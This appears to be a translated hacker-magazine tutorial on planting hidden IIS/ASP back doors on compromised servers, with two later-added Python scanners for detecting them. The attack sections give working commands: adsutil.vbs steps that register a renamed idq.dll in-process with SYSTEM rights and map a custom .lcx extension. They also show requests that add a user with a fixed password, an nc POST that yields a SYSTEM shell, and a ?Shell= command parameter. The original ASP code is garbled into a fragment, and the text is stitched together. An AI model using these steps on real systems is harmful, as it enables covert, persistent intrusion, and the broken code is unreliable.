Author: Lcx
Source: Hacker X Files

An ASP page placed on a compromised host (a "broiler") as a back door will slip past anti-virus software even if only the variable names are changed, but a careful administrator will still notice an extra ASP file in the web directory. I see two ways around this problem. One is ASP injection (the word seems very popular right now); the other is to have asp.dll in the IIS manager parse an arbitrary file extension. Neither method is technically demanding, but the idea is a good one, and if you think it through further you can configure a wonderful IIS back door. The details follow.

1. Placing an ASP back door by ASP injection

Look first at Figure 1: this is the login page of the "Mobile Network" article management system on our machine. Nothing looks different from normal, and all the original features still work. Now look at Figure 2 and compare the two. The URL in Figure 1 is http://192.168.1.3/asp/wz/admin.asp; the URL in Figure 2 is http://192.168.1.3/asp/wz/admin.asp?id=1. Adding the parameter "?id=1" after admin.asp brings the back door up. In Figure 2 you type a file name into the first input box, paste any code you like into the text box after it, and press the button to generate a CGI / ASP / PHP / ASPX or other web back door, or any text file at all. How is this done? Modify the following code as its comments indicate and you can insert it into any ASP page. code:
Value =
>
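As an added defensive counterpart (not part of the original article), here is a Python scanner for the pattern the injected back door depends on: an ASP page that creates a FileSystemObject, calls a file-writing method, and feeds it request-supplied data, optionally behind a hidden query-string switch such as admin.asp?id=1. The two sample pages are constructed for the test, and the regexes, the extension list and the function names are my assumptions, not the article's code.

```python
"""Flag ASP pages that write files from request-supplied data, the pattern
the article's injected back door relies on (FSO + file write + Request).
Added defensive example; the two sample pages below are constructed."""
import os
import re
from typing import Dict, List

# Three indicators: the FSO is instantiated, a file-writing member is called,
# and something from the request is read. All three together in one page is
# the "type a file name, paste any code, generate" back door described above.
FSO_RE = re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"', re.I)
WRITE_RE = re.compile(r'\.(CreateTextFile|OpenTextFile|CopyFile|MoveFile)\b', re.I)
REQUEST_RE = re.compile(r'\bRequest(\.Form|\.QueryString)?\s*\(', re.I)
# A query-string value compared against a literal: a hidden switch (the
# article's admin.asp?id=1) that turns an ordinary page into the back door.
TRIGGER_RE = re.compile(
    r'Request(?:\.QueryString)?\s*\(\s*"(\w+)"\s*\)\s*=\s*"?(\w+)"?', re.I)


def scan_asp_source(source: str) -> Dict[str, object]:
    """Return which indicators fire in one page and the hidden triggers found."""
    hits: Dict[str, object] = {
        "fso": bool(FSO_RE.search(source)),
        "file_write": bool(WRITE_RE.search(source)),
        "request_input": bool(REQUEST_RE.search(source)),
        "triggers": [f"{p}={v}" for p, v in TRIGGER_RE.findall(source)],
    }
    # Request-controlled data reaching a file writer is what matters;
    # a trigger alone is only a hint.
    hits["suspicious"] = bool(hits["fso"] and hits["file_write"]
                              and hits["request_input"])
    return hits


# Extensions a default IIS 5 install hands to asp.dll (assumed list).
ASP_EXTS = (".asp", ".asa", ".cer", ".cdx")


def scan_webroot(root: str) -> List[str]:
    """Walk a web root and return the paths of pages that look like file writers."""
    flagged: List[str] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(ASP_EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1", errors="replace") as fh:
                if scan_asp_source(fh.read())["suspicious"]:
                    flagged.append(path)
    return flagged


# Constructed samples: a plain login handler, and a page with the indicators.
BENIGN_ASP = '''<%
user = Request.Form("username")
pwd = Request.Form("password")
If user = "" Then Response.Redirect "login.asp"
%>'''

SUSPECT_ASP = '''<%
If Request.QueryString("id") = "1" Then
  Set fso = Server.CreateObject("Scripting.FileSystemObject")
  Set f = fso.CreateTextFile(Server.MapPath(Request.Form("fname")), True)
End If
%>'''

if __name__ == "__main__":
    for label, page in (("benign", BENIGN_ASP), ("suspect", SUSPECT_ASP)):
        print(label, scan_asp_source(page))
```

Run scan_webroot against the site's content directory to get a list of pages worth a manual look. The regexes are a first pass only: the article itself notes that renaming variables defeats signature scanning, and string concatenation or Execute/Eval can hide the FSO literal, so the robust check is a file-integrity comparison of the deployed site against a known-good copy, which would also have caught the modified admin.asp in Figure 2.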
Note that this code requires the server to support the FSO, and it does not take effect in every ASP file: depending on what code the ASP file you insert it into already contains, this code may not work, but it will not affect the use of the original file. If you can write ASP yourself, you can also write some ASP back doors directly into an original ASP file on the broiler.

2. Placing an ASP back door by mapping an arbitrary extension in the IIS manager

This is done as follows: open Control Panel - Administrative Tools - Internet Services Manager, select the web site, right-click - Properties - Home Directory - Configuration - Add. I added a file mapping for the extension .lcx, parsed by asp.dll under NT\System32, as in Figure 3. After that, rename the common cmd.asp to cmd.lcx and run it. What happens? Figure 4: the same web back door. Which extension is the most inconspicuous is left to your ingenuity.

3. A deeper look at ASP back door placement

Above I used asp.dll to parse the .lcx extension. What if a special DLL of our own parsed .lcx instead? If you can program, write a DLL to suit your needs. Can't? Ha, Yuan Ge of the Green League (NSFocus) has already written one for us. I doubt anyone does not know it: idq.dll, the one you place in the scripts directory, connect to with ISPC and use with the U vulnerability to raise privileges. Now, what happens if I use this idq.dll for the mapping method of the ASP back door above? It can be used for two things. First, requesting http://targetip/anything.lcx adds a user IISUser with the password abcd1234 (Figure 5). This xxx.lcx can be named anything, and the file does not need to exist on the host. If you are still not satisfied, we use nc to log in to the host. Type the following: nc targetip 80, then POST /%08/anything.lcx. How about that? You are logged in, and under W2K SP3 it is SYSTEM authority (Figure 6). Space does not allow the principle to be explained here; you can read the article on IIS configuration file back doors written by Tombkeeper at the Green League. The netizen Czy also wrote a similar DLL; you use it by entering http://ip/*.<your suffix>?Shell=<the command you want> in IE. Look at the back door I made on a broiler, where I used it to parse the .ph4 extension (Figure 7).

Seeing this, you may say: this IIS back door is installed through the 3389 terminal, so what do you do from the command line? We have a way for that too. A default IIS installation generates 19 VBS scripts in the \inetpub\adminscripts directory, and we use one of them, adsutil.vbs, to help us install this wonderful IIS back door.
With that said, let us walk through the happy command-line version:

1. Copy idq.dll to %SystemRoot%\System32\iisapi.dll:
   copy idq.dll %SystemRoot%\System32\iisapi.dll

2. Get the list of sites:
   cscript adsutil.vbs enum /p /w3svc
   [/w3svc/info]
   [/w3svc/filters]
   [/w3svc/2]   ----------> these are the virtual sites
   [/w3svc/3]
   [/w3svc/4]

3. Get all the privileged DLLs from IIS. The listing looks like this:
   "c:\winnt\system32\idq.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll"

4. Add the iisapi.dll copied in step 1 to the InProcessIsapiApps group so that our back door runs with LOCAL_SYSTEM permissions. In this step you must also include the DLLs you saw in step 3; if you do not add them, the original DLLs lose their privilege.
   cscript adsutil.vbs set /w3svc/InProcessIsapiApps "c:\winnt\system32\idq.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll" "c:\winnt\system32\iisapi.dll"

5. Set the mapping:
   cscript adsutil.vbs set /w3svc/scriptmaps ".asp,c:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE" ".cer,c:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE" ".asa,c:\winnt\system32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE" ".idc,c:\winnt\system32\inetsrv\httpodbc.dll,1,OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE" ".shtm,c:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST" ".shtml,c:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST" ".stm,c:\winnt\system32\inetsrv\ssinc.dll,1,GET,POST" ".lcx,c:\winnt\system32\iisapi.dll,3,GET,HEAD,POST"

   These are the mappings of a default installation as shown in the IIS manager, plus our added .lcx mapping, which is parsed by the iisapi.dll we copied. Note the last entry, the .lcx mapping; you can add your own extension mapping there.
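The same adsutil.vbs listings are what an administrator should audit, since both the extension-to-asp.dll trick and the in-process DLL back door leave their trace in the metabase. The following Python script is an added defensive example, not the article's code: it parses the quoted items of an adsutil.vbs listing and reports any script map whose handler is not a default IIS 5 DLL at its expected location, any non-default extension mapped to a legitimate handler, and any in-process ISAPI application outside the default set. The listing format, the KNOWN_HANDLERS table and DEFAULT_EXTS are my assumptions; the sample listings are constructed from the default entries the article reproduces, with its .lcx mapping and iisapi.dll appended.

```python
"""Audit IIS 5 script maps and in-process ISAPI apps as dumped by adsutil.vbs.
Added defensive example, not the article's code; the sample listings below
are constructed (defaults from the article plus its .lcx / iisapi.dll additions)."""
import re
from typing import Dict, List, NamedTuple


class ScriptMap(NamedTuple):
    ext: str
    handler: str
    flags: str
    verbs: List[str]


# Handler file name -> directory it lives in on a default IIS 5 install
# (assumed from the article's listing). Anything else is foreign.
KNOWN_HANDLERS: Dict[str, str] = {
    "asp.dll": "inetsrv", "httpodbc.dll": "inetsrv", "ssinc.dll": "inetsrv",
    "httpext.dll": "inetsrv", "idq.dll": "system32", "msw3prt.dll": "system32",
}
# Extensions those handlers serve by default. A non-default extension mapped to
# a legitimate handler (e.g. .lcx -> asp.dll) is the article's second method.
DEFAULT_EXTS = {".asp", ".cer", ".asa", ".idc", ".shtm", ".shtml", ".stm"}

QUOTED = re.compile(r'"([^"]*)"')


def parse_quoted_list(output: str) -> List[str]:
    """Return the quoted items of an adsutil.vbs listing (assumed output shape)."""
    return [m.group(1) for m in QUOTED.finditer(output)]


def parse_scriptmap(item: str) -> ScriptMap:
    """Split 'ext,handler,flags,verb,...' into fields, tolerating short entries."""
    parts = [p.strip() for p in item.split(",")]
    while len(parts) < 3:
        parts.append("")
    ext, handler, flags, *verbs = parts
    return ScriptMap(ext.lower(), handler, flags, [v.upper() for v in verbs])


def handler_ok(path: str) -> bool:
    """True when the handler is a known DLL name sitting in its expected directory."""
    parts = re.split(r"[\\/]", path.lower())
    name = parts[-1]
    parent = parts[-2] if len(parts) > 1 else ""
    return KNOWN_HANDLERS.get(name) == parent


def audit_scriptmaps(output: str) -> List[str]:
    """Report unknown handlers and non-default extensions in a ScriptMaps listing."""
    findings: List[str] = []
    for item in parse_quoted_list(output):
        sm = parse_scriptmap(item)
        if not handler_ok(sm.handler):
            findings.append(f"{sm.ext}: unknown handler {sm.handler}")
        elif sm.ext not in DEFAULT_EXTS:
            findings.append(f"{sm.ext}: non-default extension mapped to {sm.handler}")
    return findings


def audit_inproc(output: str) -> List[str]:
    """Report in-process ISAPI apps (they run as LocalSystem) outside the default set."""
    return [f"foreign in-process ISAPI app: {p}"
            for p in parse_quoted_list(output) if not handler_ok(p)]


# Constructed sample listings, modelled on the article's defaults plus its additions.
SCRIPTMAPS_OUTPUT = r'''ScriptMaps : (LIST) (8 Items)
  ".asp,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
  ".cer,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
  ".asa,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
  ".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1,OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE"
  ".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"
  ".shtml,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"
  ".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"
  ".lcx,C:\WINNT\System32\iisapi.dll,3,GET,HEAD,POST"
'''
INPROC_OUTPUT = r'''InProcessIsapiApps : (LIST) (6 Items)
  "C:\WINNT\System32\idq.dll"
  "C:\WINNT\System32\inetsrv\httpext.dll"
  "C:\WINNT\System32\inetsrv\httpodbc.dll"
  "C:\WINNT\System32\inetsrv\ssinc.dll"
  "C:\WINNT\System32\msw3prt.dll"
  "C:\WINNT\System32\iisapi.dll"
'''

if __name__ == "__main__":
    for line in audit_scriptmaps(SCRIPTMAPS_OUTPUT) + audit_inproc(INPROC_OUTPUT):
        print(line)
```

On the constructed listings this reports the .lcx map and the extra in-process DLL. The check is by name and directory only, so a renamed idq.dll dropped over a legitimate handler path would pass; pair it with a hash comparison of every mapped DLL against known-good copies, and, as IIS Lockdown did, remove the default mappings a site does not use (.cer, .asa, .idc, .shtm, .shtml, .stm) so that the remaining list is short enough to review by eye.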